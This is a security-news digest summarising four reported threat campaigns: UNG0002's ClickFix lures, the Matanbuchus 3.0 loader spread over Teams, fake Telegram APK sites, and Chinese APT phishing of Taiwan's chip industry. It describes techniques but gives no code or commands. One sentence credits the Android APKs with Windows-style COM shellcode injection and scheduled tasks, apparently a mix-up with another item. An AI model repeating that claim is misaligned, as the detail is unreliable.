UNG0002 Deploys ClickFix Technique with Custom RAT Arsenal in Multi-Campaign Operations
Cybersecurity researchers at Seqrite Labs have attributed two distinct, technically advanced cyber-espionage campaigns—Operation Cobalt Whisper (May–Sept 2024) and Operation AmberMist (Jan–May 2025)—to a state-aligned Southeast Asian threat actor tracked as UNG0002. The group initially focused on defense contractors, aviation firms, and electrotechnical engineering organizations, utilizing well-known frameworks such as Cobalt Strike and Metasploit for post-exploitation activities. In Operation AmberMist, their targeting broadened to include gaming companies, academic institutions, and software development firms. This phase marked a technical escalation, with the deployment of custom remote access tools including Shadow RAT, INET RAT, and a Blister DLL Implant. These implants were delivered via phishing emails containing LNK files that initiated multi-stage execution chains combining VBScript, batch, and PowerShell components to evade endpoint detection and establish persistence. One of UNG0002’s most notable techniques of adoption is the “ClickFix” technique, which manipulates victims through fake CAPTCHA verification pages to execute malicious PowerShell payloads. The threat group has gone so far as to spoof official government websites, including Pakistan’s Ministry of Maritime Affairs, to lend legitimacy to these lures. Their use of DLL sideloading—executing malware through trusted binaries like Rasphone and Node-Webkit—further underscores their operational sophistication. Artifacts recovered by Seqrite revealed usernames like “The Freelancer” and “Shockwave” embedded in their code, suggesting either internal codenames or deliberate misdirection to complicate attribution. Based on their infrastructure, tooling, and targeting patterns, researchers assess with high confidence that UNG0002 is conducting sustained cyber-espionage in support of geopolitical intelligence objectives, with a high degree of resource backing and planning consistency.
Matanbuchus 3.0 Abuses Microsoft Teams for Initial Access
Matanbuchus 3.0, a sophisticated malware-as-a-service (MaaS) loader, has resurfaced with enhanced features designed to improve stealth and detection evasion. Originally marketed in 2021 on Russian-speaking cybercrime forums, the latest variant was observed in a July 2025 attack where threat actors impersonated an IT help desk during a Microsoft Teams call. Victims were persuaded to launch Quick Assist, which granted remote access, enabling attackers to deploy a PowerShell script and execute Matanbuchus. The loader was delivered using a renamed Notepad++ updater and a malicious DLL via DLL sideloading, a common evasion technique employed by malware. Once executed, the malware collected system data, scanned for security tools, and checked for administrative privileges before communicating with its command-and-control (C2) infrastructure. It then downloaded additional payloads in the form of MSI installers and executables, enabling it to escalate the attack chain further. Matanbuchus 3.0 includes support for CMD and PowerShell reverse shells, in-memory execution, and obfuscation enhancements that make it harder to detect using signature-based tools. It leverages living-off-the-land binaries (LOLBins) such as regsvr32, rundll32, and msiexec, along with COM hijacking and shellcode injection for persistence and execution. The loader is capable of enumerating running processes, services, and installed applications, providing attackers with a detailed snapshot of the compromised environment. Its use of COM to schedule tasks—rather than using traditional Windows utilities—demonstrates an evolution in stealth and sophistication. The campaign reflects a broader trend in which enterprise communication platforms, such as Microsoft Teams and Zoom, are being exploited for initial access. Matanbuchus’s continued development and high rental cost (up to $15,000 per month) show it remains a premium tool favored by organized threat actors for delivering ransomware and Cobalt Strike payloads.
Rogue Domains Spread Fake Telegram APKs in Mobile Malware Surge
Researchers at PreCrime Labs uncovered a sophisticated mobile malware campaign involving over 600 malicious domains used to distribute fake Telegram APKs. These phishing sites, primarily hosted in Chinese and registered through the Gname registrar, mimic Telegram branding and redirect victims via QR codes to a central domain, zifeiji[.]asia, which serves malware-infected APKs. The APKs are signed using the deprecated Android v1 scheme, making them vulnerable to the Janus flaw. This security gap allows attackers to tamper with legitimate apps while maintaining their original signature. Once installed on Android devices running 5.0–8.0, the malware requests broad permissions, including file access, and leverages cleartext protocols such as HTTP and FTP to communicate. It uses MediaPlayer and socket callbacks to execute remote commands, enabling real-time surveillance and data theft. The phishing sites also use SEO tricks and typosquatted Telegram domains to increase visibility and trick users. The campaign’s infrastructure includes a tracking JavaScript file (ajs[.]js) that fingerprints victims and sends data to an external analytics server. Researchers also found that a linked Firebase database (tmessages2) appears abandoned, creating a risk of Firebase hijacking if attackers re-register it to reconnect to dormant implants. The campaign spans multiple TLDs, including [.]com, [.]xyz, and [.]online, and the malware’s payload size and obfuscation techniques suggest ongoing refinement. The APKs, which are roughly 60–70MB in size, facilitate remote control and persistence through scheduled tasks and COM-based shellcode injection. To counter these threats, security teams should employ automated domain monitoring, block installs from unknown sources, and use multi-source threat intelligence to validate APKs and domains. This case highlights the convergence of mobile malware, phishing, and infrastructure abuse to execute stealthy, scalable Android-based attacks.
Chinese APTs Target Taiwan's Semiconductor Supply Chain
Between March and June 2025, multiple Chinese state-sponsored threat groups launched targeted cyber-espionage campaigns against Taiwan’s semiconductor sector, aiming to infiltrate companies across the design, manufacturing, and financial investment ecosystems. Proofpoint attributed these operations to three clusters: UNK_FistBump, UNK_DropPitch, and UNK_SparkyCarp, each employing spear-phishing tactics tailored to their respective targets. UNK_FistBump impersonated graduate students to lure HR personnel into opening LNK files disguised as resumes, resulting in the deployment of Cobalt Strike or a custom backdoor called Voldemort. This backdoor, previously tied to APT41-aligned group TA415, was used in a distinct fashion by FistBump, featuring a unique loader and hardcoded IP-based C2 infrastructure. Meanwhile, UNK_DropPitch targeted investment analysts via emails with embedded links that delivered a malicious DLL payload through ZIP files. The dropped backdoor, HealthKick, enabled command execution and data exfiltration, while follow-on stages leveraged reverse shells and Intel EMA for deep access. These campaigns illustrate a comprehensive interest not only in semiconductor design but also in the broader strategic and financial layers surrounding the industry. UNK_SparkyCarp focused on credential phishing, using a custom adversary-in-the-middle (AitM) kit to impersonate account login alerts sent to employees at a Taiwanese chip company. Victims were directed to a credential harvesting site, while additional tracking beacons were embedded. Infrastructure tied to the campaigns revealed the use of SoftEther VPN servers and recycled TLS certificates associated with malware, such as SideWalk and MoonBounce, hinting at either shared tooling or common infrastructure among China-aligned APTs. Additionally, a fourth group—UNK_ColtCentury (also known as TAG-100 or Storm-2077)—was observed engaging in benign, legal correspondence to establish rapport before delivering the Spark RAT for remote access. Collectively, these efforts reflect China's sustained priority to reduce dependency on foreign semiconductor supply chains, especially under tightening export restrictions from Taiwan and the U.S. The technical sophistication, reuse of implants, and diverse targeting indicate long-term investment in espionage capabilities designed to advance China’s strategic industrial ambitions.
